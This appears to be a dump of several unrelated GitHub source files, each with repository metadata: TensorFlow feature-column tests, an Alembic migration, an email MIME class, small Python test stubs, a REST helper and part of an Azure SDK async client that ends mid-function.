indices=[[0, 0], [1, 0]],
shape=[2, 2])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country, age, incomes],
num_outputs=5))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
incomes_weights = column_to_variable[incomes][0]
sess.run(incomes_weights.assign([[0.01, 0.1, 1., 10., 100.],
[0.02, 0.2, 2., 20., 200.],
[0.03, 0.3, 3., 30., 300.]]))
self.assertAllClose(output.eval(), [[14., 140., 1400., 14000., 140000.],
[1.4, 14., 140., 1400., 14000.]])
def testBucketizedColumn(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
with tf.Graph().as_default():
# buckets 2, 3, 0
features = {"price": tf.constant([[20.], [110], [-3]])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[bucket],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
sess.run(column_to_variable[bucket][0].assign([[0.1], [0.2], [0.3], [0.4
]]))
self.assertAllClose(output.eval(), [[0.3], [0.4], [0.1]])
def testBucketizedColumnHavingMultiDimensions(self):
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", 2),
boundaries=[0., 10., 100.])
with tf.Graph().as_default():
# buckets 2, 3, 0
features = {"price": tf.constant([[20., 210], [110, 50], [-3, -30]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [1, 0]],
shape=[3, 2])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[bucket, country],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
# dimension = 2, bucket_size = 4, num_classes = 1
sess.run(column_to_variable[bucket][0].assign(
[[0.1], [0.2], [0.3], [0.4], [1], [2], [3], [4]]))
self.assertAllClose(output.eval(), [[0.3 + 4], [0.4 + 3], [0.1 + 1]])
def testMulticlassWithBucketizedColumnHavingMultiDimensions(self):
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", 2),
boundaries=[0., 10., 100.])
with tf.Graph().as_default():
# buckets 2, 3, 0
features = {"price": tf.constant([[20., 210], [110, 50], [-3, -30]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [1, 0]],
shape=[3, 2])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[bucket, country],
num_outputs=5))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
# dimension = 2, bucket_size = 4, num_classes = 5
sess.run(column_to_variable[bucket][0].assign(
[[0.1, 1, 10, 100, 1000], [0.2, 2, 20, 200, 2000],
[0.3, 3, 30, 300, 3000], [0.4, 4, 40, 400, 4000],
[5, 50, 500, 5000, 50000], [6, 60, 600, 6000, 60000],
[7, 70, 700, 7000, 70000], [8, 80, 800, 8000, 80000]]))
self.assertAllClose(
output.eval(),
[[0.3 + 8, 3 + 80, 30 + 800, 300 + 8000, 3000 + 80000],
[0.4 + 7, 4 + 70, 40 + 700, 400 + 7000, 4000 + 70000],
[0.1 + 5, 1 + 50, 10 + 500, 100 + 5000, 1000 + 50000]])
def testCrossWithBucketizedColumn(self):
price_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_price = tf.contrib.layers.crossed_column(
[country, price_bucket], hash_bucket_size=10)
with tf.Graph().as_default():
features = {
"price": tf.constant([[20.]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[country_price],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
weights = column_to_variable[country_price][0]
sess.run(weights.assign(weights + 0.4))
# There are two crosses each with 0.4 weight.
# score = 0.4 + 0.4
self.assertAllClose(output.eval(), [[0.8]])
def testCrossWithCrossedColumn(self):
price_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=3)
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_language = tf.contrib.layers.crossed_column(
[language, country], hash_bucket_size=10)
country_language_price = tf.contrib.layers.crossed_column(
set([country_language, price_bucket]),
hash_bucket_size=15)
with tf.Graph().as_default():
features = {
"price": tf.constant([[20.]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2]),
"language": tf.SparseTensor(values=["english", "spanish"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country_language_price],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
weights = column_to_variable[country_language_price][0]
sess.run(weights.assign(weights + 0.4))
# There are two crosses each with 0.4 weight.
# score = 0.4 + 0.4 + 0.4 + 0.4
self.assertAllClose(output.eval(), [[1.6]])
def testIntegerizedColumn(self):
product = tf.contrib.layers.sparse_column_with_integerized_feature(
"product", bucket_size=5)
with tf.Graph().as_default():
features = {"product": tf.SparseTensor(values=[0, 4, 2],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[product],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
product_weights = column_to_variable[product][0]
sess.run(product_weights.assign([[0.1], [0.2], [0.3], [0.4], [0.5]]))
self.assertAllClose(output.eval(), [[0.1], [0.5], [0.3]])
def testIntegerizedColumnWithInvalidId(self):
product = tf.contrib.layers.sparse_column_with_integerized_feature(
"product", bucket_size=5)
with tf.Graph().as_default():
features = {"product": tf.SparseTensor(values=[5, 4, 7],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[product],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
product_weights = column_to_variable[product][0]
sess.run(product_weights.assign([[0.1], [0.2], [0.3], [0.4], [0.5]]))
self.assertAllClose(output.eval(), [[0.1], [0.5], [0.3]])
def testMulticlassWithOnlyBias(self):
with tf.Graph().as_default():
features = {"age": tf.constant([[10.], [20.], [30.], [40.]])}
output, _, bias = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [tf.contrib.layers.real_valued_column("age")],
num_outputs=3)
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
sess.run(bias.assign([0.1, 0.2, 0.3]))
self.assertAllClose(output.eval(), [[0.1, 0.2, 0.3], [0.1, 0.2, 0.3],
[0.1, 0.2, 0.3], [0.1, 0.2, 0.3]])
def testMulticlassWithRealValuedColumn(self):
with tf.Graph().as_default():
column = tf.contrib.layers.real_valued_column("age")
features = {"age": tf.constant([[10.], [20.], [30.], [40.]])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[column],
num_outputs=3))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
weights = column_to_variable[column][0]
self.assertEqual(weights.get_shape(), (1, 3))
sess.run(weights.assign([[0.01, 0.03, 0.05]]))
self.assertAllClose(output.eval(), [[0.1, 0.3, 0.5], [0.2, 0.6, 1.0],
[0.3, 0.9, 1.5], [0.4, 1.2, 2.0]])
def testMulticlassWithSparseColumn(self):
with tf.Graph().as_default():
column = tf.contrib.layers.sparse_column_with_keys(
column_name="language",
keys=["english", "arabic", "hindi", "russian", "swahili"])
features = {
"language": tf.SparseTensor(
values=["hindi", "english", "arabic", "russian"],
indices=[[0, 0], [1, 0], [2, 0], [3, 0]],
shape=[4, 1])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[column],
num_outputs=3))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
weights = column_to_variable[column][0]
self.assertEqual(weights.get_shape(), (5, 3))
sess.run(weights.assign([[0.1, 0.4, 0.7], [0.2, 0.5, 0.8],
[0.3, 0.6, 0.9], [0.4, 0.7, 1.0], [0.5, 0.8,
1.1]]))
self.assertAllClose(output.eval(), [[0.3, 0.6, 0.9], [0.1, 0.4, 0.7],
[0.2, 0.5, 0.8], [0.4, 0.7, 1.0]])
def testMulticlassWithBucketizedColumn(self):
column = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 100., 500., 1000.])
with tf.Graph().as_default():
# buckets 0, 2, 1, 2
features = {"price": tf.constant([[-3], [110], [20.], [210]])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[column],
num_outputs=3))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
weights = column_to_variable[column][0]
self.assertEqual(weights.get_shape(), (5, 3))
sess.run(weights.assign([[0.1, 0.4, 0.7], [0.2, 0.5, 0.8],
[0.3, 0.6, 0.9], [0.4, 0.7, 1.0], [0.5, 0.8,
1.1]]))
self.assertAllClose(output.eval(), [[0.1, 0.4, 0.7], [0.3, 0.6, 0.9],
[0.2, 0.5, 0.8], [0.3, 0.6, 0.9]])
def testMulticlassWithCrossedColumn(self):
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=3)
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=2)
column = tf.contrib.layers.crossed_column(
{language, country}, hash_bucket_size=5)
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(
values=["english", "spanish", "russian", "swahili"],
indices=[[0, 0], [1, 0], [2, 0], [3, 0]],
shape=[4, 1]),
"country": tf.SparseTensor(values=["US", "SV", "RU", "KE"],
indices=[[0, 0], [1, 0], [2, 0], [3, 0]],
shape=[4, 1])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[column],
num_outputs=3))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
weights = column_to_variable[column][0]
self.assertEqual(weights.get_shape(), (5, 3))
sess.run(weights.assign([[0.1, 0.4, 0.7], [0.2, 0.5, 0.8],
[0.3, 0.6, 0.9], [0.4, 0.7, 1.0], [0.5, 0.8,
1.1]]))
self.assertAllClose(tf.shape(output).eval(), [4, 3])
def testMulticlassWithMultivalentColumn(self):
column = tf.contrib.layers.sparse_column_with_keys(
column_name="language",
keys=["english", "turkish", "hindi", "russian", "swahili"])
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(
values=["hindi", "english", "turkish", "turkish", "english"],
indices=[[0, 0], [0, 1], [1, 0], [2, 0], [3, 0]],
shape=[4, 2])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[column],
num_outputs=3))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
weights = column_to_variable[column][0]
self.assertEqual(weights.get_shape(), (5, 3))
sess.run(weights.assign([[0.1, 0.4, 0.7], [0.2, 0.5, 0.8],
[0.3, 0.6, 0.9], [0.4, 0.7, 1.0], [0.5, 0.8,
1.1]]))
self.assertAllClose(output.eval(), [[0.4, 1.0, 1.6], [0.2, 0.5, 0.8],
[0.2, 0.5, 0.8], [0.1, 0.4, 0.7]])
def testVariablesAddedToCollection(self):
price_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_price = tf.contrib.layers.crossed_column(
[country, price_bucket], hash_bucket_size=10)
with tf.Graph().as_default():
features = {
"price": tf.constant([[20.]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country_price, price_bucket],
num_outputs=1,
weight_collections=["my_collection"])
weights = tf.get_collection("my_collection")
# 3 = bias + price_bucket + country_price
self.assertEqual(3, len(weights))
class ParseExampleTest(tf.test.TestCase):
def testParseExample(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", dimension=3),
boundaries=[0., 10., 100.])
wire_cast = tf.contrib.layers.sparse_column_with_keys(
"wire_cast", ["marlo", "omar", "stringer"])
# buckets 2, 3, 0
data = tf.train.Example(features=tf.train.Features(feature={
"price": tf.train.Feature(float_list=tf.train.FloatList(value=[20., 110,
-3])),
"wire_cast": tf.train.Feature(bytes_list=tf.train.BytesList(value=[
b"stringer", b"marlo"
])),
}))
output = tf.contrib.layers.parse_feature_columns_from_examples(
serialized=[data.SerializeToString()],
feature_columns=[bucket, wire_cast])
self.assertIn(bucket, output)
self.assertIn(wire_cast, output)
with self.test_session():
tf.initialize_all_tables().run()
self.assertAllEqual(output[bucket].eval(), [[2, 3, 0]])
self.assertAllEqual(output[wire_cast].indices.eval(), [[0, 0], [0, 1]])
self.assertAllEqual(output[wire_cast].values.eval(), [2, 0])
class InferRealValuedColumnTest(tf.test.TestCase):
def testTensor(self):
self.assertEqual(
tf.contrib.layers.infer_real_valued_columns(
tf.zeros(shape=[33, 4], dtype=tf.int32)),
[tf.contrib.layers.real_valued_column("", dimension=4, dtype=tf.int32)])
def testDictionary(self):
self.assertItemsEqual(
tf.contrib.layers.infer_real_valued_columns({
"a": tf.zeros(shape=[33, 4], dtype=tf.int32),
"b": tf.zeros(shape=[3, 2], dtype=tf.float32)
}),
[tf.contrib.layers.real_valued_column(
"a", dimension=4, dtype=tf.int32),
tf.contrib.layers.real_valued_column(
"b", dimension=2, dtype=tf.float32)])
def testNotGoodDtype(self):
with self.assertRaises(ValueError):
tf.contrib.layers.infer_real_valued_columns(
tf.constant([["a"]], dtype=tf.string))
def testSparseTensor(self):
with self.assertRaises(ValueError):
tf.contrib.layers.infer_real_valued_columns(
tf.SparseTensor(indices=[[0, 0]], values=["a"], shape=[1, 1]))
if __name__ == "__main__":
tf.test.main()
| {
"content_hash": "36be26bc97c6af981751618e4625d03b",
"timestamp": "",
"source": "github",
"line_count": 1117,
"max_line_length": 80,
"avg_line_length": 47.42614145031334,
"alnum_prop": 0.5427277017461066,
"repo_name": "dhalleine/tensorflow",
"id": "d36e369ef76fb45af5d138a168af52e6d57f3fbf",
"size": "53664",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensorflow/contrib/layers/python/layers/feature_column_ops_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "152404"
},
{
"name": "C++",
"bytes": "7305808"
},
{
"name": "CMake",
"bytes": "29325"
},
{
"name": "CSS",
"bytes": "107"
},
{
"name": "HTML",
"bytes": "677843"
},
{
"name": "Java",
"bytes": "50361"
},
{
"name": "JavaScript",
"bytes": "16098"
},
{
"name": "Jupyter Notebook",
"bytes": "777976"
},
{
"name": "Objective-C",
"bytes": "1288"
},
{
"name": "Protocol Buffer",
"bytes": "101759"
},
{
"name": "Python",
"bytes": "4184469"
},
{
"name": "Shell",
"bytes": "77957"
},
{
"name": "TypeScript",
"bytes": "328956"
}
],
"symlink_target": ""
} |
"""added psysuite apk management
Revision ID: 1322ec780acd
Revises: 8ee4d82ef1a1
Create Date: 2020-07-30 16:27:14.595064
"""
# revision identifiers, used by Alembic.
revision = '1322ec780acd'
down_revision = '8ee4d82ef1a1'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('psysuite_mobile_application',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('version', sa.Integer(), nullable=False),
sa.Column('sver', sa.String(), nullable=True),
sa.Column('description', sa.String(), nullable=True),
sa.Column('apk_path', sa.String(), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('version')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('psysuite_mobile_application')
### end Alembic commands ###
| {
"content_hash": "10634da2385b9cd18f6a01d547f74c5d",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 63,
"avg_line_length": 27.970588235294116,
"alnum_prop": 0.6855941114616193,
"repo_name": "allspeak/api.allspeak.eu",
"id": "c32faa8d99205d17f502b05c70e5f69dd82cbed7",
"size": "951",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "web/migrations/versions/1322ec780acd_added_psysuite_apk_management.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "542"
},
{
"name": "Dockerfile",
"bytes": "337"
},
{
"name": "HTML",
"bytes": "15330"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "132944"
},
{
"name": "Shell",
"bytes": "697"
}
],
"symlink_target": ""
} |
"""Class representing message/* MIME documents."""
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
__all__ = ['MIMEMessage']
from future.backports.email import message
from future.backports.email.mime.nonmultipart import MIMENonMultipart
class MIMEMessage(MIMENonMultipart):
"""Class representing message/* MIME documents."""
def __init__(self, _msg, _subtype='rfc822'):
"""Create a message/* type MIME document.
_msg is a message object and must be an instance of Message, or a
derived class of Message, otherwise a TypeError is raised.
Optional _subtype defines the subtype of the contained message. The
default is "rfc822" (this is defined by the MIME standard, even though
the term "rfc822" is technically outdated by RFC 2822).
"""
MIMENonMultipart.__init__(self, 'message', _subtype)
if not isinstance(_msg, message.Message):
raise TypeError('Argument is not an instance of Message')
# It's convenient to use this base class method. We need to do it
# this way or we'll get an exception
message.Message.attach(self, _msg)
# And be sure our default type is set correctly
self.set_default_type('message/rfc822')
| {
"content_hash": "8fd6fb375576f137226bc3c20f85fedc",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 78,
"avg_line_length": 41.03030303030303,
"alnum_prop": 0.6646971935007385,
"repo_name": "agincel/AdamTestBot",
"id": "f53bd78a8b8ad4c0ef0b7cc5fe6d1c06fae7d08b",
"size": "1465",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "future/backports/email/mime/message.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "54"
},
{
"name": "Python",
"bytes": "3462168"
},
{
"name": "Shell",
"bytes": "406"
}
],
"symlink_target": ""
} |
"""
test_section
------------
Tests for `section` models module.
"""
import os
import shutil
import unittest
from section import models
class TestSection(unittest.TestCase):
def setUp(self):
pass
def test_something(self):
pass
def tearDown(self):
pass
| {
"content_hash": "245c97e8d13822a4a65b9b1b7afdf503",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 37,
"avg_line_length": 12.333333333333334,
"alnum_prop": 0.6283783783783784,
"repo_name": "thongly/independent-section",
"id": "9b9c8f5cb9f9ff09ba676e0a227e7442ec3526d4",
"size": "343",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "661"
},
{
"name": "Makefile",
"bytes": "1222"
},
{
"name": "Python",
"bytes": "3874"
}
],
"symlink_target": ""
} |
from fladgejt.helpers import decode_key
from fladgejt.structures import Studium, ZapisnyList
def convert(rows):
# For now, votrfront expects all columns to be strings, not numbers or null.
return [{ k: '' if v is None else str(v) for k, v in row.items() } for row in rows]
class RestStudiumMixin:
def get_studia(self):
studia = convert(self.context.request_json('studium'))
result = [Studium(sp_skratka=row['studijnyProgramSkratka'],
sp_popis=row['studijnyProgramPopis'],
sp_doplnujuce_udaje=row['studijnyProgramDoplnujuceUdaje'],
zaciatok=row['zaciatokStudia'],
koniec=row['koniecStudia'],
sp_dlzka=row['studijnyProgramDlzka'],
sp_cislo=row['studijnyProgramIdProgramCRS'],
rok_studia=row['rokStudia'],
organizacna_jednotka=row['organizacnaJednotka'])
for row in studia]
return result
def get_zapisne_listy(self, studium_key):
sp_skratka, zaciatok = decode_key(studium_key)
zapisne_listy = convert(self.context.request_json(
"studium/zapisneListy",
skratkaStudijnehoProgramu=sp_skratka,
zaciatokStudia=zaciatok))
result = [ZapisnyList(akademicky_rok=row['popisAkadRok'],
rocnik=row['rokRocnik'],
sp_skratka=row['studProgramSkratka'],
sp_popis=row['studProgramPopis'],
datum_zapisu=row['datumZapisu'],
studium_key=studium_key)
for row in zapisne_listy]
return result
| {
"content_hash": "adca421d75723598c37db57e26afd4f2",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 87,
"avg_line_length": 42.30952380952381,
"alnum_prop": 0.5576814856499719,
"repo_name": "fmfi-svt/votr",
"id": "a830f7bcd175a4c932b014ea3187813861a00c74",
"size": "1778",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "fladgejt/rest/studium.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "131300"
},
{
"name": "Python",
"bytes": "264927"
},
{
"name": "SCSS",
"bytes": "9269"
}
],
"symlink_target": ""
} |
import pytest
from tests.providers.google.cloud.utils.gcp_authenticator import GCP_DATACATALOG_KEY
from tests.test_utils.gcp_system_helpers import CLOUD_DAG_FOLDER, GoogleSystemTest, provide_gcp_context
@pytest.mark.credential_file(GCP_DATACATALOG_KEY)
class CloudDataflowExampleDagsSystemTest(GoogleSystemTest):
@provide_gcp_context(GCP_DATACATALOG_KEY)
def test_run_example_gcp_dataflow_native_java(self):
self.run_dag('example_gcp_datacatalog', CLOUD_DAG_FOLDER)
| {
"content_hash": "342f471fc38c2dc030989707e02d5758",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 103,
"avg_line_length": 44.09090909090909,
"alnum_prop": 0.8020618556701031,
"repo_name": "sekikn/incubator-airflow",
"id": "724faf8dcc896197a4b946847da963193bcce235",
"size": "1272",
"binary": false,
"copies": "4",
"ref": "refs/heads/main",
"path": "tests/providers/google/cloud/operators/test_datacatalog_system.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "13715"
},
{
"name": "Dockerfile",
"bytes": "15900"
},
{
"name": "HTML",
"bytes": "151266"
},
{
"name": "JavaScript",
"bytes": "25486"
},
{
"name": "Jupyter Notebook",
"bytes": "2933"
},
{
"name": "Mako",
"bytes": "1339"
},
{
"name": "Python",
"bytes": "10792443"
},
{
"name": "Shell",
"bytes": "243458"
},
{
"name": "TSQL",
"bytes": "879"
}
],
"symlink_target": ""
} |
from typing import Any, AsyncIterable, Callable, Dict, Optional, TypeVar, Union
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._build_service_agent_pool_operations import build_get_request, build_list_request, build_update_put_request_initial
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class BuildServiceAgentPoolOperations:
"""BuildServiceAgentPoolOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.appplatform.v2022_04_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def list(
self,
resource_group_name: str,
service_name: str,
build_service_name: str,
**kwargs: Any
) -> AsyncIterable["_models.BuildServiceAgentPoolResourceCollection"]:
"""List build service agent pool.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param service_name: The name of the Service resource.
:type service_name: str
:param build_service_name: The name of the build service resource.
:type build_service_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either BuildServiceAgentPoolResourceCollection or the
result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.appplatform.v2022_04_01.models.BuildServiceAgentPoolResourceCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop('api_version', "2022-04-01") # type: str
cls = kwargs.pop('cls', None) # type: ClsType["_models.BuildServiceAgentPoolResourceCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
service_name=service_name,
build_service_name=build_service_name,
api_version=api_version,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
service_name=service_name,
build_service_name=build_service_name,
api_version=api_version,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("BuildServiceAgentPoolResourceCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/buildServices/{buildServiceName}/agentPools"} # type: ignore
@distributed_trace_async
async def get(
self,
resource_group_name: str,
service_name: str,
build_service_name: str,
agent_pool_name: str,
**kwargs: Any
) -> "_models.BuildServiceAgentPoolResource":
"""Get build service agent pool.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param service_name: The name of the Service resource.
:type service_name: str
:param build_service_name: The name of the build service resource.
:type build_service_name: str
:param agent_pool_name: The name of the build service agent pool resource.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: BuildServiceAgentPoolResource, or the result of cls(response)
:rtype: ~azure.mgmt.appplatform.v2022_04_01.models.BuildServiceAgentPoolResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.BuildServiceAgentPoolResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2022-04-01") # type: str
request = build_get_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
service_name=service_name,
build_service_name=build_service_name,
agent_pool_name=agent_pool_name,
api_version=api_version,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('BuildServiceAgentPoolResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/buildServices/{buildServiceName}/agentPools/{agentPoolName}"} # type: ignore
async def _update_put_initial(
self,
resource_group_name: str,
service_name: str,
build_service_name: str,
agent_pool_name: str,
agent_pool_resource: "_models.BuildServiceAgentPoolResource",
**kwargs: Any
) -> "_models.BuildServiceAgentPoolResource":
cls = kwargs.pop('cls', None) # type: ClsType["_models.BuildServiceAgentPoolResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2022-04-01") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(agent_pool_resource, 'BuildServiceAgentPoolResource')
request = build_update_put_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
service_name=service_name,
build_service_name=build_service_name,
agent_pool_name=agent_pool_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._update_put_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
